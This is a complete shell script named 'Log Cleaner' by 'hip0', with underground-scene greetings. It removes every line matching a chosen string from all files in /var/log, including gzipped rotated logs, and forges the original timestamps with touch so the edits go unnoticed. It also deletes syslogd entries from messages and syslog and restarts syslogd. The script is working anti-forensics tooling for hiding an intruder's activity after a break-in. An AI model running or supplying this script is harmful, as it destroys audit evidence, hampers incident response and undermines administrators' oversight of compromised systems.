#!/bin/sh
# Log Cleaner v. 0.6 by hip0. 
#               NO WARRANTIES USE AT YOUR OWN RISK !
# Under GPL ver. 2.0 or above. Check out www.gnu.org for more info.
# Greetings fly to:
# Authors of the underground-book -- http://www.underground-book.com
# Also to the beatiful of Midnigh Oil.
# Special thanx to this people for laying there asses in #pcfreak
# on uni-bg.
# STRASHARO, ORDER, UTP, necroleak, Static, Sic-a, vaso, dr0p,
# hip3, Hacko_; Sorry if i forgot someone.
# Everyone other that knows and respect me should feel greeted too ;]
# For bugs and suggestions, flames etc. sent to hipodilski@dahmer.vistech.net
# http://rootshell.be/~pcfreak -- Say no to M$.
# 
# Usage notes. the shellscript takes 2 arguments.
# The 1st one is the "string" to grep out from all the files, dirs
# and subdirs in /var/log; The 2nd one is: "-v" if used you'll have
# verbose output. 
# Enjoy your cleaning:]
# Improved on Jun 23 2004: Fixed some bugs and stuff ....
# Improved on Feb 25 2005: Fixed bug that strips from wtmp and lastlog.
# Fixed funny bug with the strip from /var/log/faillog :] that
# makes root non loggable
# Enjoy!

# Dir where new triggered files should go.
new_path="/var/log/new";

# Dir from which we'll take the files to be triggered.
log_dir="/var/log";

# binary logs that needs to be excluded from the strip
exclude1="wtmp";
exclude2="lastlog";
exclude3="faillog";
exclude4="supervise";

# The grepped string usually entered at the command line.
grep_var="$1";

# Don't edit this.
verbose='-v';
string2="$2";
cut_var="new";
verbose_on='';

# Change to default script defined log directory.
change_to_def_dir () {
cd $log_dir;
}

# Cleans files from $new_path to prevent from problems ...
clean_dir () {
if test -d  $new_path && [ "$i" == "$log_dir" ]; then
rm -rf $new_path/*;
fi
}

# Checks for the entered arguments.
chk_args () {
 if [ -z "$grep_var" ] || \
 [ -n "$string2" ] && [ "$string2" != "$verbose" ]; then
  echo "Log Cleaner by hip0";
   echo "-=================-";
   echo -e "Bad Syntax, Examples:"
   echo -e "\n$0 string\nfor verbose: $0 string -v";
  exit 0;
 fi

 if [ "$string2" == "$verbose" ]; then
  verbose_on=1;
   else
  verbose_on='';
 fi

}

# Checks for $new_path's existence.
chk_new_path_existence () {

 if test -d $new_path; then
  cat /dev/null;
   else
  mkdir $new_path;
 fi

}

# checks the flow for dirs.
chk_dir () {

 if [ -d "$i" ] && [ ! -a "$i" ] && \
[ -z "`echo $i | grep .gz`" ] && [ "$i" != "$cut_var" ] &&\
[ -s "$i" ] && [ "$i" != "$exclude4" ]; then
 z="$i";
  cp -rfp $i $new_path/$i;
   new_i="$i";

     for i in `ls -1 $new_path/$new_i`; do
      gz_name="$i";
       cut_gz=${gz_name/.gz/};
        gzip -d -f -q -c $new_path/$new_i/$i > $new_path/$new_i/$cut_gz.new1;
       cat $new_path/$new_i/$cut_gz.new1 | grep -v "$grep_var" \
> $new_path/$new_i/$cut_gz.new;
     gzip -c -f -q $new_path/$new_i/$cut_gz.new > $new_path/$new_i/$i;
    rm -f $new_path/$new_i/$cut_gz.new; 
   rm -f $new_path/$new_i/$cut_gz.new1;
  touch -acmr $log_dir/$z/$i $new_path/$new_i/$i;

 if [ "$verbose_on" == 1 ]; then
  echo "Ungzipping: $i";
   echo "Grepping: $grep_var out of $i";
   echo "gzipping: $cut_gz as: $i";
  echo -e "Setting timestamps from: $log_dir/$z/$i\nto: $new_path/$new_i/$i";
 fi

      done
 fi
}

# Checks for normal ( not gzipped ) files.
chk_file () {
 if [ -a "$i" ] && [ ! -d "$i" ] && [ -z "`echo $i | grep .gz`" ] &&\
 [ "$i" != "$exclude1" ] && [ "$i" != "$exclude2" ] &&\
 [ "$i" != "$exclude3" ] && [ -s "$i" ]; then
  cp -rpf $i $new_path/$i;
  cat /dev/null > $new_path/$i;
  cat $i | grep -v $grep_var > $new_path/$i
  touch -acmr $log_dir/$i $new_path/$i; 

  if [ "$verbose_on" == 1 ]; then
   echo "Grepping: $grep_var out of: $i";
  fi

 fi
}

# Checks for gzipped files.
chk_gz_file () {

if [ -n "`echo $i | grep .gz`" ] && [ -a "$i" ] && \
[ ! -d "$i" ] && [ -s "$i" ]; then

 cp -rpf $i $new_path/$i;
  gzip -d -f -q $new_path/$i;
   gz_name="$i";
  cut_gz=${gz_name/.gz/};
   cat $new_path/$cut_gz | grep -v $grep_var > $new_path/$cut_gz.new;
  gzip -c -f -q $new_path/$cut_gz.new > $new_path/$i;
   rm -f $new_path/$cut_gz.new; rm -f $new_path/$cut_gz;
  touch -acmr $log_dir/$i $new_path/$i;

 if [ "$verbose_on" == 1 ]; then
  echo "$i is gzipped file.";
   echo "Ungzipping $i at $new_path/$i.";
   echo "Catting $cut_gz and grepping $grep_var from it.";
  echo -e "Setting timestamps from: $log_dir/$i\n to $new_path/$i"; 
 fi

 fi
}

# Does most of the stuff.
main_cycle () {

 for i in `ls -1`; do
  chk_dir;
  chk_file;
  chk_gz_file;
 done

rm -f $new_path/`basename $0`;

}

# copy from the the pseudo temp directory to the real log store dir.
copy_to_orig_dest () {

if [ "$verbose_on" == 1 ]; then
 echo "Copying $new_path's content to: $log_dir";
fi
cp -rpf $new_path/* $log_dir;

}

# get rid of the junked "temp" files.
if [ "$verbose_on" == 1 ]; then
echo "Now $new_path GO TO HELL!!!";
fi
get_rid_of_junk () {
rm -rf $new_path;
}

 #restarts syslogd
rest_syslogd () {
 sys="syslogd";
 mesg="$log_dir/messages";
 sysl="$log_dir/syslog";
 fail="$log_dir/faillog";
 if [ -f "$mesg" ]; then
    cat $mesg | grep -v $sys > $mesg.new
    mv $mesg.new $mesg;
   fi

   if [ -f "$sysl" ]; then
    cat $sysl | grep -v $sys > $sysl.new;
     mv $sysl.new $sysl;
     fi
      if [ "$(ps ax | grep syslogd| grep -v grep)" ]; then
      killall -s HUP syslogd;
      fi

      }
      


# Core functions that calls the other ones above.
main () {

 change_to_def_dir;
 chk_args;
 chk_new_path_existence;
 clean_dir;
 main_cycle;
 copy_to_orig_dest;
 get_rid_of_junk;
 rest_syslogd;

}
 main;